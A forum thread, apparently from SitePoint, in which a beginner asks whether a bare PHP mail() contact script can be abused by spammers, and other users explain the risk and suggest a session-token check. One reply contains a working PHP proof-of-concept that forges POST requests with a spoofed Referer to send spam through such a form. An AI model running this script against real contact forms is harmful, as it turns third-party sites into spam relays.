SitePoint Sponsor

User Tag List

Results 1 to 6 of 6
  1. #1
    SitePoint Zealot Blunderboy's Avatar
    Join Date
    Mar 2003
    Location
    Germany
    Posts
    151
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    simple email script insecure?

    Ok, noobie question here. Can the following simple email script be easily hacked? (eg abused by spammers?)
    The actual form is made in Flash.

    <?php

    $mail_to ="emailaddress@whateverblah.com";
    $mail_subject = "subject";
    $mail_body = "body stuff";

    if(mail($mail_to, $mail_subject, $mail_body))
    echo "Successfully sent e-mail \"$mail_subject\" to $mail_to.";
    else echo "Failed to send e-mail \"$mail_subject\"."
    ?>

  2. #2
    SitePoint Zealot
    Join Date
    Aug 2003
    Location
    everywhere
    Posts
    179
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    You'll need some way of identifying if a user has submitted for form in xtime. For example i could spam that form by simply creating a new form have it directed to the mail page and use a cronjob to simply have it going on specified time intervals.
    Webmobo - Open Source News Scripts
    Portfolio / Blog

  3. #3
    SitePoint Zealot Blunderboy's Avatar
    Join Date
    Mar 2003
    Location
    Germany
    Posts
    151
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by gsoft
    You'll need some way of identifying if a user has submitted for form in xtime. For example i could spam that form by simply creating a new form have it directed to the mail page and use a cronjob to simply have it going on specified time intervals.
    Wait a minute, a new form directed to the mail page? Can you please explain how you would do that? I want to use this simple contact form on a website, but if it's so easy to hack then obviously I won't.

  4. #4
    PHP manual bot bronze trophy Gaheris's Avatar
    Join Date
    Oct 2003
    Location
    Germany
    Posts
    2,195
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    It doesn't even have to be a form. Someone who wanted to abuse this simply has to write a script which sends a POST request to your script.


    All he had to do would be to send the request for example like this.
    Even checking the referer wouldn't help since it has been faked.
    PHP Code:
    <?php
    $body  
    'This is our example spam mail';
    $topic 'FREE stuff';
    $addresses = array(
        
    'foo@bar.com',
        
    'example@test.com',
        
    'spam@me.com'
    );

    foreach (
    $addresses as $email) {
        
    $fp fsockopen('www.example.com'80);
        if (
    $fp) {
            
    $query 'email_body='.$body.'&email_to='.$email.'&email_subject='.$topic;
            
    $req   "POST /scripts/email.php HTTP/1.0\r\n";
            
    $req  .= "Host: www.example.com\r\n";
            
    $req  .= "Referer: http://www.example.com/contact.html\r\n";
            
    $req  .= "Content-type: application/x-www-form-urlencoded\r\n";
            
    $req  .= "Content-length: "strlen($query) ."\r\n";
            
    $req  .= "Connection: close\r\n\r\n";
            
    $req  .= $query;
            
    fwrite($fp$req);
            
            
    $answer '';
            while (!
    feof($fp)) {
                
    $answer .= fread($fp1024);
            }
            
    fclose($fp);
        } else {
            continue;
        }
        echo 
    'Successfully spammed ' $email;
    }
    ?>

  5. #5
    SitePoint Zealot Blunderboy's Avatar
    Join Date
    Mar 2003
    Location
    Germany
    Posts
    151
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    So it looks like I shouldn't use such a script. But if I did use this on a site, and it was to get hacked by a spammer, am I then the one held responsible?

  6. #6
    ********* wombat firepages's Avatar
    Join Date
    Jul 2000
    Location
    Perth Australia
    Posts
    1,717
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    when you display the form do a loadvariables() call in flash and load data from a .php file , in that file start a session with some unique value and pass it as a hidden field via your form , on the processing end check that the session id passed in the hidden field matches the one stord in the current session & off you go.

    of course nothing is foolproof.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •